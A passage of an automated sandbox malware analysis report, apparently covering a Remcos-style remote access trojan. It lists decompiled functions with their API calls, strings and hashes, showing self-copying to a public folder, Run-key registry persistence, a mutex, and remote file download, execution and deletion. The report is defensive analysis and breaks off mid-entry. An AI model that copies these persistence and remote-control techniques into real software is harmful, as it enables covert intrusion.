                                                                                        • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CBAE
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041CBB1
                                                                                        • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040E9E1), ref: 0041CBC3
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041CBC6
                                                                                        • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040E9E1), ref: 0041CBD2
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041CBD5
                                                                                        • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E9E1), ref: 0041CBE6
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041CBE9
                                                                                        • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E9E1), ref: 0041CBFA
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041CBFD
                                                                                        • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040E9E1), ref: 0041CC0E
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041CC11
                                                                                        • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E9E1), ref: 0041CC22
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041CC25
                                                                                        • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E9E1), ref: 0041CC36
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041CC39
                                                                                        • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E9E1), ref: 0041CC4A
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041CC4D
                                                                                        • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E9E1), ref: 0041CC5E
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041CC61
                                                                                        • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E9E1), ref: 0041CC72
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041CC75
                                                                                        • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040E9E1), ref: 0041CC83
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041CC86
                                                                                        • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040E9E1), ref: 0041CC97
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041CC9A
                                                                                        • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040E9E1), ref: 0041CCA7
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041CCAA
                                                                                        • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040E9E1), ref: 0041CCB7
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041CCBA
                                                                                        • LoadLibraryA.KERNELBASE(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040E9E1), ref: 0041CCCC
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041CCCF
                                                                                        • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040E9E1), ref: 0041CCDC
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041CCDF
                                                                                        • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040E9E1), ref: 0041CCF0
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041CCF3
                                                                                        • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040E9E1), ref: 0041CD04
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041CD07
                                                                                        • LoadLibraryA.KERNELBASE(Rstrtmgr,RmStartSession,?,?,?,?,0040E9E1), ref: 0041CD19
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041CD1C
                                                                                        • LoadLibraryA.KERNEL32(Rstrtmgr,RmRegisterResources,?,?,?,?,0040E9E1), ref: 0041CD29
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041CD2C
                                                                                        • LoadLibraryA.KERNEL32(Rstrtmgr,RmGetList,?,?,?,?,0040E9E1), ref: 0041CD39
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041CD3C
                                                                                        • LoadLibraryA.KERNEL32(Rstrtmgr,RmEndSession,?,?,?,?,0040E9E1), ref: 0041CD49
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041CD4C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AddressProc$LibraryLoad$HandleModule
                                                                                        • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                                                        • API String ID: 4236061018-3687161714
                                                                                        • Opcode ID: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
                                                                                        • Instruction ID: 43d5c3d51f8f0173c8b3474e0c84bdc355f07b7b5b23ff39ae26555794408ecb
                                                                                        • Opcode Fuzzy Hash: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
                                                                                        • Instruction Fuzzy Hash: 31419EA0EC035879DA107BB66DCDE3B3E5CD9857953214837B15CA7150EBBCD8408EAE
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0040CDF9 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 203fileCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • _wcslen.LIBCMT ref: 0040CE07
                                                                                        • CreateDirectoryW.KERNELBASE(00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE20
                                                                                        • CopyFileW.KERNELBASE(C:\Users\Public\Libraries\nmfsxfjX.pif,00000000,00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040CED0
                                                                                        • _wcslen.LIBCMT ref: 0040CEE6
                                                                                        • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CF6E
                                                                                        • CopyFileW.KERNEL32(C:\Users\Public\Libraries\nmfsxfjX.pif,00000000,00000000), ref: 0040CF84
                                                                                        • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFC3
                                                                                        • _wcslen.LIBCMT ref: 0040CFC6
                                                                                        • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFDD
                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004750E4,0000000E), ref: 0040D02D
                                                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000001), ref: 0040D04B
                                                                                        • ExitProcess.KERNEL32 ref: 0040D062
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                                                                        • String ID: 6$C:\Users\Public\Libraries\nmfsxfjX.pif$del$open
                                                                                        • API String ID: 1579085052-3703211178
                                                                                        • Opcode ID: f93ee9b19be39af8b2c6cf1a511189d127526c6382b99c39daec8717fd067cfe
                                                                                        • Instruction ID: 6918cae47ac4af68ec004dabb58255b0e3542cbe00f5913d2fcd66cab837b2ae
                                                                                        • Opcode Fuzzy Hash: f93ee9b19be39af8b2c6cf1a511189d127526c6382b99c39daec8717fd067cfe
                                                                                        • Instruction Fuzzy Hash: CA51A620208302ABD605B7659C92A6F679D9F84719F10443FF609A62E3EFBC9D05866E
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0040DA34 Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 139COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • GetLongPathNameW.KERNELBASE(00000000,?,00000208), ref: 0040DB9A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: LongNamePath
                                                                                        • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                                                        • API String ID: 82841172-425784914
                                                                                        • Opcode ID: 27fe91012a163c2b4846bfbe880e9f299d57e6666512bed227f78a6c4b2faef2
                                                                                        • Instruction ID: 0cc8b9c4d8a16f3fd89327f32322cd7e2fd47b59120d3573c9b2d8a81569e3eb
                                                                                        • Opcode Fuzzy Hash: 27fe91012a163c2b4846bfbe880e9f299d57e6666512bed227f78a6c4b2faef2
                                                                                        • Instruction Fuzzy Hash: FB414F715082019AC215FB61DC52DAEB3F8AE90718F10053FB546A60E2FFB8AE49C65F
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0041B2C3 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 61COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                          • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                                                                                          • Part of subcall function 0041BFB7: IsWow64Process.KERNEL32(00000000,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFCF
                                                                                          • Part of subcall function 004135A6: RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 004135CA
                                                                                          • Part of subcall function 004135A6: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 004135E7
                                                                                          • Part of subcall function 004135A6: RegCloseKey.KERNELBASE(?), ref: 004135F2
                                                                                        • StrToIntA.SHLWAPI(00000000,0046C9F8,00000000,00000000,00000000,004750E4,00000003,Exe,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0041B33C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Process$CloseCurrentOpenQueryValueWow64
                                                                                        • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                        • API String ID: 782494840-2070987746
                                                                                        • Opcode ID: 96ddb31e540ae966eb624fdd9b0772b0253fe90f3b489e3583c12feb0da0b553
                                                                                        • Instruction ID: 0537cd1ef0e49ffa1b211e53375311a7de90e31f2ded896f28e78de68f6ce99c
                                                                                        • Opcode Fuzzy Hash: 96ddb31e540ae966eb624fdd9b0772b0253fe90f3b489e3583c12feb0da0b553
                                                                                        • Instruction Fuzzy Hash: 42112370A4010566C704B3668C87EFF77198B95314F94013BF856A21E2FB6C599683AE
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00413814 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39registryCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 656 413814-413827 RegCreateKeyW 657 413866 656->657 658 413829-413864 call 40247c call 401f04 RegSetValueExW RegCloseKey 656->658 659 413868-413876 call 401f09 657->659 658->659
                                                                                        APIs
                                                                                        • RegCreateKeyW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,?), ref: 0041381F
                                                                                        • RegSetValueExW.KERNELBASE(?,00000000,00000000,00000001,00000000,00000000,?,?,?,?,00000000,004752D8,762337E0,?), ref: 0041384D
                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,004752D8,762337E0,?,?,?,?,?,0040CFAA,?,00000000), ref: 00413858
                                                                                        Strings
                                                                                        • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 0041381D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseCreateValue
                                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                                                        • API String ID: 1818849710-1051519024
                                                                                        • Opcode ID: 7402a2b63bcdafcb128c4f053b5539bf219f88ac2658cd62b5e42ce82679dadc
                                                                                        • Instruction ID: 91b44a8789fefabe47d0aed0b401f4e945a8dec35bb1902c17c37083bf943f80
                                                                                        • Opcode Fuzzy Hash: 7402a2b63bcdafcb128c4f053b5539bf219f88ac2658cd62b5e42ce82679dadc
                                                                                        • Instruction Fuzzy Hash: 83F0C271440218FBDF10AFA1EC45FEE376CEF00B56F10452AF905A61A1E7359F04DA94
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0040D069 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 666 40d069-40d095 call 401fab CreateMutexA GetLastError
                                                                                        APIs
                                                                                        • CreateMutexA.KERNELBASE(00000000,00000001,00000000,0040EC08,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0040D078
                                                                                        • GetLastError.KERNEL32 ref: 0040D083
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateErrorLastMutex
                                                                                        • String ID: Rmc-L24XL1
                                                                                        • API String ID: 1925916568-2965804744
                                                                                        • Opcode ID: 801f4fab6620dad4192684c1acb97daf4a6912092659b95b34e50827bd09c0e4
                                                                                        • Instruction ID: 95155ffd2f5cf2c34283977deb482d2843c3ccfb5002447f486bda260673b364
                                                                                        • Opcode Fuzzy Hash: 801f4fab6620dad4192684c1acb97daf4a6912092659b95b34e50827bd09c0e4
                                                                                        • Instruction Fuzzy Hash: 18D012B0604701EBD7181770ED5975839959744702F40487AB50BD99F1CBAC88908519
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 004135A6 Relevance: 4.5, APIs: 3, Instructions: 44registryCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 669 4135a6-4135d2 RegOpenKeyExA 670 4135d4-4135fc RegQueryValueExA RegCloseKey 669->670 671 413607 669->671 672 413609 670->672 673 4135fe-413605 670->673 671->672 674 41360e-41361a call 402093 672->674 673->674
                                                                                        APIs
                                                                                        • RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 004135CA
                                                                                        • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 004135E7
                                                                                        • RegCloseKey.KERNELBASE(?), ref: 004135F2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseOpenQueryValue
                                                                                        • String ID:
                                                                                        • API String ID: 3677997916-0
                                                                                        • Opcode ID: 8a165f7f556a11d3abfab9d86b37d0f406e8581ec1eb6973fd31e646fb445763
                                                                                        • Instruction ID: 357f89d7cd1c8cc036c5e31f86fe90e90b696c4569df010e686479b524d11f87
                                                                                        • Opcode Fuzzy Hash: 8a165f7f556a11d3abfab9d86b37d0f406e8581ec1eb6973fd31e646fb445763
                                                                                        • Instruction Fuzzy Hash: 5A01D676900228BBCF209B91DC09DEF7FBDDB84751F000066BB09E2240DA748E45DBA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0044F3DD Relevance: 4.5, APIs: 3, Instructions: 37COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • GetEnvironmentStringsW.KERNEL32 ref: 0044F3E1
                                                                                        • _free.LIBCMT ref: 0044F41A
                                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F421
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: EnvironmentStrings$Free_free
                                                                                        • String ID:
                                                                                        • API String ID: 2716640707-0
                                                                                        • Opcode ID: 0c06709d10dba2764a1cbb07d76eee89d47f0343aa971453893a7dc6290cd450
                                                                                        • Instruction ID: a95b0472bde791e81118f5b212bf6f07b4125f005b99c6aef0626ee370485fe8
                                                                                        • Opcode Fuzzy Hash: 0c06709d10dba2764a1cbb07d76eee89d47f0343aa971453893a7dc6290cd450
                                                                                        • Instruction Fuzzy Hash: 50E06577144A216BB211362A7C49D6F2A18DFD67BA727013BF45486143DE288D0641FA
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00413549 Relevance: 4.5, APIs: 3, Instructions: 37registryCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 677 413549-413571 RegOpenKeyExA 678 4135a0 677->678 679 413573-41359e RegQueryValueExA RegCloseKey 677->679 680 4135a2-4135a5 678->680 679->680
                                                                                        APIs
                                                                                        • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,00000000,00000000), ref: 00413569
                                                                                        • RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 00413587
                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00413592
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseOpenQueryValue
                                                                                        • String ID:
                                                                                        • API String ID: 3677997916-0
                                                                                        • Opcode ID: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                                                                        • Instruction ID: df0ca7b2621da3f23a966dc0a7f3323316399916f3769291e5945d4ebcba47cd
                                                                                        • Opcode Fuzzy Hash: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                                                                        • Instruction Fuzzy Hash: E8F01776900218FFDF109FA0DC05FEEBBBCEB04B11F1040A6BA09E6191E2359F54AB94
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00446137 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 723 446137-446143 724 446175-446180 call 4405dd 723->724 725 446145-446147 723->725 732 446182-446184 724->732 726 446160-446171 RtlAllocateHeap 725->726 727 446149-44614a 725->727 730 446173 726->730 731 44614c-446153 call 445545 726->731 727->726 730->732 731->724 735 446155-44615e call 442f80 731->735 735->724 735->726
                                                                                        APIs
                                                                                        • RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AllocateHeap
                                                                                        • String ID:
                                                                                        • API String ID: 1279760036-0
                                                                                        • Opcode ID: 091c80118a57d95ebc2facbedd4e69ebcf5b938ae1e913472e35806a21779949
                                                                                        • Instruction ID: 4903450aafda00484806ba385278610c2731405ed8485190d5fd86014b6ab98c
                                                                                        • Opcode Fuzzy Hash: 091c80118a57d95ebc2facbedd4e69ebcf5b938ae1e913472e35806a21779949
                                                                                        • Instruction Fuzzy Hash: 92E0ED3120062577FB2226669D05B5B365D9F033A2F160127EC0AA2283DF7CCC0081EF
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Non-executed Functions

                                                                                        Function 00407C97 Relevance: 44.6, APIs: 10, Strings: 15, Instructions: 835filesleepCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SetEvent.KERNEL32(?,?), ref: 00407CB9
                                                                                        • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407D87
                                                                                        • DeleteFileW.KERNEL32(00000000), ref: 00407DA9
                                                                                          • Part of subcall function 0041C291: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00474EE0,?), ref: 0041C2EC
                                                                                          • Part of subcall function 0041C291: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00474EE0,?), ref: 0041C31C
                                                                                          • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00474EE0,?), ref: 0041C371
                                                                                          • Part of subcall function 0041C291: FindClose.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C3D2
                                                                                          • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C3D9
                                                                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                          • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                                                          • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,00401A45,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000), ref: 00404B47
                                                                                          • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000,?,?,?,?,?,00401A45), ref: 00404B75
                                                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00408197
                                                                                        • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 00408278
                                                                                        • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084C4
                                                                                        • DeleteFileA.KERNEL32(?), ref: 00408652
                                                                                          • Part of subcall function 0040880C: __EH_prolog.LIBCMT ref: 00408811
                                                                                          • Part of subcall function 0040880C: FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
                                                                                          • Part of subcall function 0040880C: __CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
                                                                                          • Part of subcall function 0040880C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF
                                                                                        • Sleep.KERNEL32(000007D0), ref: 004086F8
                                                                                        • StrToIntA.SHLWAPI(00000000,00000000), ref: 0040873A
                                                                                          • Part of subcall function 0041C9E2: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CAD7
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                                                                                        • String ID: (PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$XPG$XPG$XPG$XPG$open$NG
                                                                                        • API String ID: 1067849700-181434739
                                                                                        • Opcode ID: 3b7c4b3d7d449749017bc82f18da2b12a0677a5740b025592c3c036ee554d5ba
                                                                                        • Instruction ID: 75e26f7f6c3f3dbd7fc3c9379f58c72dc3a715cd35b24c1fb8b7d51949cc7e38
                                                                                        • Opcode Fuzzy Hash: 3b7c4b3d7d449749017bc82f18da2b12a0677a5740b025592c3c036ee554d5ba
                                                                                        • Instruction Fuzzy Hash: FE427F71A043016BC604FB76C95B9AE77A5AF91348F40093FF542671E2EE7C9A08879B
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0040569A Relevance: 40.5, APIs: 15, Strings: 8, Instructions: 278pipesleepfileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • __Init_thread_footer.LIBCMT ref: 004056E6
                                                                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
